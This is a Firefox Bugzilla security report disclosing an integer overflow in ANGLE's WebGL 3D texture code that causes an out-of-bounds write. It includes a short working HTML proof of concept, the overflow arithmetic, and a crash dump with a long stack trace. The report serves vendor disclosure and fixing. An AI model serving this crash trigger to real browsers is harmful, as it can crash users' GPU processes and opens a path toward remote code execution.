1730637 - WebGL - Buffer overflow with 3D texture in Initialize4ComponentData().

Reporter

Description

•

4 years ago

Attached file BOF_Initialize4ComponentData_PoC.html — Details

VULNERABILITY DETAILS
Specifically crafted HTML file can trigger Buffer overflow with 3D texture in WebGL code. This bug may be potantially exploited to achieve one click remote code execution in GPU process.

For the following API call from the PoC:

	gl.texStorage3D(gl.TEXTURE_3D, 7, gl.RGB32F,  737,979 , 403)

The source buffer size in Initialize4ComponentData() ((https://searchfox.org/mozilla-central/source/gfx/angle/checkout/src/image_util/loadimage.inc#136 ) ) is:

	  depth * height * width * sizeof(type) * 4
	= 0x193 * 0x3d3  * 0x2e1  * 4 * 4
	= 403   * 979    * 737   * 4 * 4
	= 4,652,380,304

However, there is an integer overflow with the calculation of the destination buffer in caller GenerateInitialTextureData() (https://searchfox.org/mozilla-central/source/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/renderer11_utils.cpp#2196 )
maxImageSize is defined as 32 bit 32 bit integer in 
angle::Result GenerateInitialTextureData(
	...
	{
	...

		unsigned int rowPitch     = dxgiFormatInfo.pixelBytes * width;
		unsigned int depthPitch   = rowPitch * height;
		unsigned int maxImageSize = depthPitch * depth;
		...

With the PoC, the size calculation is:

	unsigned int rowPitch     = dxgiFormatInfo.pixelBytes * width;
								 16                       * 737  = 11792
	unsigned int depthPitch   = rowPitch * height;
								 11792   *  979                  =  11544368
	unsigned int maxImageSize = depthPitch * depth;
								 11544368  * 403

maximum unsigned 32 bit integer is 0xFFFFFFFF = 4294967295.
depthPitch * depth is 4,652,380,304(11544368  * 403), but the assinee maxImageSize is unsigned 32 bit integer, so integer overflow occurs.
After the overflow, maxImageSize is actually 357413008 (4,652,380,304 - 0x100000000).

So when the memcpy in Initialize4ComponentData() tries to copy pixels from source buffer of size 4,652,380,304 to destination buffer of smaller size 357413008, out of bound write occurs:

	inline void Initialize4ComponentData(size_t width, size_t height, size_t depth,
										 uint8_t *output, size_t outputRowPitch, size_t outputDepthPitch)
	{
	...
					memcpy(destPixel, writeValues, sizeof(type) * 4);
					
	( https://searchfox.org/mozilla-central/source/gfx/angle/checkout/src/image_util/loadimage.inc#158 )


An ASAN report is also attached for your easy asessment.

VERSION
Firefox 94.0a1 (2021-09-13) (64-bit)
OS Windows 10 OS Version 2009 (Build 19043.1165)

REPRODUCTION CASE ( BOF_Initialize4ComponentData_PoC.html )
<body><canvas id="test"></canvas></body><script>
canvas0=document.getElementById("test");
gl = canvas0.getContext("webgl2",);
gl.bindTexture(gl.TEXTURE_3D, gl.createTexture());
gl.texStorage3D(gl.TEXTURE_3D, 7, gl.RGB32F, 737,979 , 403)
</script>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: gpu process
Crash State:

(6374.42c8): Access violation - code c0000005 (!!! second chance !!!)
libGLESv2!angle::Initialize4ComponentData<float,0,0,0,1065353216>+0x37:
00007fff`deb6ba57 0f1143f4        movups  xmmword ptr [rbx-0Ch],xmm0 ds:00000208`3e8dc000=????????????????????????????????
2:045> r
rax=0000000000000287 rbx=000002083e8dc00c rcx=00000000000002e1
rdx=00000000000003d3 rsi=000002083e8dba6c rdi=00000000000003ac
rip=00007fffdeb6ba57 rsp=000000911c70e288 rbp=0000000000b02730
 r8=0000000000000193  r9=000002083de497ac r10=0000000000b02730
r11=000000000000001e r12=00000000000003d3 r13=00007fffded4f360
r14=0000000000002e10 r15=00000000000002e1
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
libGLESv2!angle::Initialize4ComponentData<float,0,0,0,1065353216>+0x37:
00007fff`deb6ba57 0f1143f4        movups  xmmword ptr [rbx-0Ch],xmm0 ds:00000208`3e8dc000=????????????????????????????????
2:045> dv
	   destPixel = <value unavailable>
			   x = <value unavailable>
		 destRow = <value unavailable>
			   y = 0x3ac
			   z = 0x1e
		   width = 0x2e1
		  height = 0x3d3
		   depth = 0x193
		  output = <value unavailable>
  outputRowPitch = 0x2e10
outputDepthPitch = 0xb02730
	 writeValues = <value unavailable>
2:045> k
 # Child-SP          RetAddr           Call Site
00 00000091`1c70e288 00007fff`deb69b7a libGLESv2!angle::Initialize4ComponentData<float,0,0,0,1065353216>+0x37 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/image_util/loadimage.inc @ 158] 
01 00000091`1c70e2b0 00007fff`deb283f3 libGLESv2!rx::d3d11::GenerateInitialTextureData+0xaa [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/renderer11_utils.cpp @ 2202] 
02 00000091`1c70e340 00007fff`deb28088 libGLESv2!rx::Image11::createStagingTexture+0x113 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/Image11.cpp @ 566] 
03 (Inline Function) --------`-------- libGLESv2!rx::Image11::getStagingTexture+0xb [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/Image11.cpp @ 513] 
04 00000091`1c70e500 00007fff`deb06ad5 libGLESv2!rx::Image11::copyToStorage+0x58 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/Image11.cpp @ 165] 
05 (Inline Function) --------`-------- libGLESv2!rx::TextureD3D::commitRegion+0x4a [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/TextureD3D.cpp @ 647] 
06 (Inline Function) --------`-------- libGLESv2!rx::TextureD3D_3D::updateStorageLevel+0xb5 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/TextureD3D.cpp @ 2985] 
07 00000091`1c70e560 00007fff`deb0610b libGLESv2!rx::TextureD3D_3D::updateStorage+0x145 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/TextureD3D.cpp @ 2908] 
08 00000091`1c70e600 00007fff`dea87fdc libGLESv2!rx::TextureD3D_3D::setStorage+0x19b [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/TextureD3D.cpp @ 2774] 
09 00000091`1c70e6a0 00007fff`dea1c554 libGLESv2!gl::Texture::setStorage+0x9c [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/Texture.cpp @ 1492] 
0a 00000091`1c70e740 00007fff`dec16454 libGLESv2!gl::Context::texStorage3D+0x74 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/Context.cpp @ 6018] 
0b 00000091`1c70e7a0 00007fff`cf622c80 libGLESv2!gl::TexStorage3D+0xe4 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libGLESv2/entry_points_gles_3_0_autogen.cpp @ 2248] 
0c 00000091`1c70e830 00007fff`cf60d734 xul!mozilla::gl::GLContext::fTexStorage3D+0x60 [/builds/worker/checkouts/gecko/gfx/gl/GLContext.h @ 3236] 
0d 00000091`1c70e8a0 00007fff`cf60d160 xul!mozilla::DoTexStorage+0xd4 [/builds/worker/checkouts/gecko/dom/canvas/WebGLTextureUpload.cpp @ 581] 
0e 00000091`1c70e940 00007fff`cf5ed3cc xul!mozilla::WebGLTexture::TexStorage+0x2d0 [/builds/worker/checkouts/gecko/dom/canvas/WebGLTextureUpload.cpp @ 870] 
0f 00000091`1c70eb50 00007fff`cf5cdbf6 xul!mozilla::WebGLContext::TexStorage+0x7c [/builds/worker/checkouts/gecko/dom/canvas/WebGLContextTextures.cpp @ 187] 
10 00000091`1c70ebd0 00007fff`cf6298dd xul!mozilla::HostWebGLContext::TexStorage+0x66 [/builds/worker/checkouts/gecko/dom/canvas/HostWebGLContext.h @ 560] 
11 00000091`1c70ec40 00007fff`cf5fc978 xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,73,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, const mozilla::avec3<unsigned int> &) const,&mozilla::HostWebGLContext::TexStorage>::DispatchCommand<mozilla::HostWebGLContext>::<unnamed-tag>::operator()<unsigned int,unsigned int,unsigned int,mozilla::avec3<unsigned int> >+0x9d [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 248] 
12 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,73,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, const mozilla::avec3<unsigned int> &) const,&mozilla::HostWebGLContext::TexStorage>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 239] 
13 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,72,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, const mozilla::avec3<unsigned int> &, const mozilla::avec2<int> &, const mozilla::avec2<unsigned int> &) const,&mozilla::HostWebGLContext::CopyTexImage>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
14 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,71,void (mozilla::HostWebGLContext::*)(unsigned int) const,&mozilla::HostWebGLContext::GenerateMipmap>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
15 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,70,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned long long) const,&mozilla::HostWebGLContext::BindTexture>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
16 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,69,void (mozilla::HostWebGLContext::*)(unsigned int) const,&mozilla::HostWebGLContext::ActiveTexture>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
17 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,68,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned int, unsigned int, unsigned int, unsigned int) const,&mozilla::HostWebGLContext::RenderbufferStorageMultisample>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
18 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,67,void (mozilla::HostWebGLContext::*)(unsigned int) const,&mozilla::HostWebGLContext::ReadBuffer>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
19 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,66,void (mozilla::HostWebGLContext::*)(unsigned int, const mozilla::RawBuffer<const unsigned int> &, int, int, int, int) const,&mozilla::HostWebGLContext::InvalidateSubFramebuffer>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
1a (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,65,void (mozilla::HostWebGLContext::*)(unsigned int, const mozilla::RawBuffer<const unsigned int> &) const,&mozilla::HostWebGLContext::InvalidateFramebuffer>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
1b (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,64,void (mozilla::HostWebGLContext::*)(int, int, int, int, int, int, int, int, unsigned int, unsigned int) const,&mozilla::HostWebGLContext::BlitFramebuffer>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
1c (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,63,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned long long, const mozilla::RawBuffer<unsigned char> &) const,&mozilla::HostWebGLContext::BufferSubData>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
1d (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,62,void (mozilla::HostWebGLContext::*)(unsigned int, const mozilla::RawBuffer<unsigned char> &, unsigned int) const,&mozilla::HostWebGLContext::BufferData>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
1e (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,61,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned long long, unsigned long long, unsigned long long) const,&mozilla::HostWebGLContext::CopyBufferSubData>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
1f (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,60,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned long long, unsigned long long, unsigned long long) const,&mozilla::HostWebGLContext::BindBufferRange>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
20 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,59,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned long long) const,&mozilla::HostWebGLContext::BindBuffer>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
21 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,58,void (mozilla::HostWebGLContext::*)(int, int, int, int) const,&mozilla::HostWebGLContext::Viewport>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
22 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,57,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, unsigned int) const,&mozilla::HostWebGLContext::StencilOpSeparate>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
23 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,56,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int) const,&mozilla::HostWebGLContext::StencilMaskSeparate>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
24 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,55,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, int, unsigned int) const,&mozilla::HostWebGLContext::StencilFuncSeparate>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
25 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,54,void (mozilla::HostWebGLContext::*)(unsigned long long, const std::basic_string<char,std::char_traits<char>,std::allocator<char> > &) const,&mozilla::HostWebGLContext::ShaderSource>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
26 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,53,void (mozilla::HostWebGLContext::*)(int, int, int, int) const,&mozilla::HostWebGLContext::Scissor>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
27 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,52,void (mozilla::HostWebGLContext::*)(float, bool) const,&mozilla::HostWebGLContext::SampleCoverage>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
28 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,51,void (mozilla::HostWebGLContext::*)(unsigned long long, mozilla::layers::TextureType, bool) const,&mozilla::HostWebGLContext::Present>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
29 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,50,void (mozilla::HostWebGLContext::*)(float, float) const,&mozilla::HostWebGLContext::PolygonOffset>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
2a (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,49,void (mozilla::HostWebGLContext::*)(unsigned long long) const,&mozilla::HostWebGLContext::LinkProgram>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
2b (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,48,void (mozilla::HostWebGLContext::*)(float) const,&mozilla::HostWebGLContext::LineWidth>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
2c (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,47,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int) const,&mozilla::HostWebGLContext::Hint>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
2d (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,46,void (mozilla::HostWebGLContext::*)(unsigned int) const,&mozilla::HostWebGLContext::FrontFace>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
2e (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,45,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, unsigned long long, int, int, int) const,&mozilla::HostWebGLContext::FramebufferAttach>::DispatchCommand+0x1215 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
2f (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,44,void (mozilla::HostWebGLContext::*)() const,&mozilla::HostWebGLContext::Flush>::DispatchCommand+0x1220 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
30 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,43,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned long long) const,&mozilla::HostWebGLContext::DetachShader>::DispatchCommand+0x1220 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
31 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,42,void (mozilla::HostWebGLContext::*)(float, float) const,&mozilla::HostWebGLContext::DepthRange>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
32 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,41,void (mozilla::HostWebGLContext::*)(bool) const,&mozilla::HostWebGLContext::DepthMask>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
33 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,40,void (mozilla::HostWebGLContext::*)(unsigned int) const,&mozilla::HostWebGLContext::DepthFunc>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
34 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,39,void (mozilla::HostWebGLContext::*)(unsigned int) const,&mozilla::HostWebGLContext::CullFace>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
35 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,38,void (mozilla::HostWebGLContext::*)(unsigned long long) const,&mozilla::HostWebGLContext::CompileShader>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
36 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,37,void (mozilla::HostWebGLContext::*)(mozilla::Maybe<unsigned int>, unsigned char) const,&mozilla::HostWebGLContext::ColorMask>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
37 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,36,void (mozilla::HostWebGLContext::*)(int) const,&mozilla::HostWebGLContext::ClearStencil>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
38 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,35,void (mozilla::HostWebGLContext::*)(float) const,&mozilla::HostWebGLContext::ClearDepth>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
39 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,34,void (mozilla::HostWebGLContext::*)(float, float, float, float) const,&mozilla::HostWebGLContext::ClearColor>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
3a (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,33,void (mozilla::HostWebGLContext::*)(unsigned int) const,&mozilla::HostWebGLContext::Clear>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
3b (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,32,void (mozilla::HostWebGLContext::*)(mozilla::Maybe<unsigned int>, unsigned int, unsigned int, unsigned int, unsigned int) const,&mozilla::HostWebGLContext::BlendFuncSeparate>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
3c (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,31,void (mozilla::HostWebGLContext::*)(mozilla::Maybe<unsigned int>, unsigned int, unsigned int) const,&mozilla::HostWebGLContext::BlendEquationSeparate>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
3d (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,30,void (mozilla::HostWebGLContext::*)(float, float, float, float) const,&mozilla::HostWebGLContext::BlendColor>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
3e (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,29,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned long long) const,&mozilla::HostWebGLContext::BindFramebuffer>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
3f (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,28,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned int, const std::basic_string<char,std::char_traits<char>,std::allocator<char> > &) const,&mozilla::HostWebGLContext::BindAttribLocation>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
40 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,27,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned long long) const,&mozilla::HostWebGLContext::AttachShader>::DispatchCommand+0x123e [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
41 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,26,void (mozilla::HostWebGLContext::*)(),&mozilla::HostWebGLContext::DidRefresh>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
42 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,25,void (mozilla::HostWebGLContext::*)(mozilla::WebGLExtensionID),&mozilla::HostWebGLContext::RequestExtension>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
43 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,24,void (mozilla::HostWebGLContext::*)(const mozilla::avec2<unsigned int> &),&mozilla::HostWebGLContext::Resize>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
44 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,23,void (mozilla::HostWebGLContext::*)(unsigned int, const std::basic_string<char,std::char_traits<char>,std::allocator<char> > &) const,&mozilla::HostWebGLContext::GenerateError>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
45 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,22,void (mozilla::HostWebGLContext::*)(unsigned int, mozilla::Maybe<unsigned int>, bool) const,&mozilla::HostWebGLContext::SetEnabled>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
46 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,21,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::DeleteVertexArray>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
47 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,20,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::DeleteTransformFeedback>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
48 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,19,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::DeleteTexture>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
49 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,18,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::DeleteSync>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
4a (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,17,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::DeleteShader>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
4b (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,16,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::DeleteSampler>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
4c (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,15,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::DeleteRenderbuffer>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
4d (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,14,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::DeleteQuery>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
4e (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,13,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::DeleteProgram>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
4f (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,12,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::DeleteFramebuffer>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
50 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,11,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::DeleteBuffer>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
51 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,10,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::CreateVertexArray>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
52 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,9,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::CreateTransformFeedback>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
53 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,8,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::CreateTexture>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
54 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,7,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::CreateSync>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
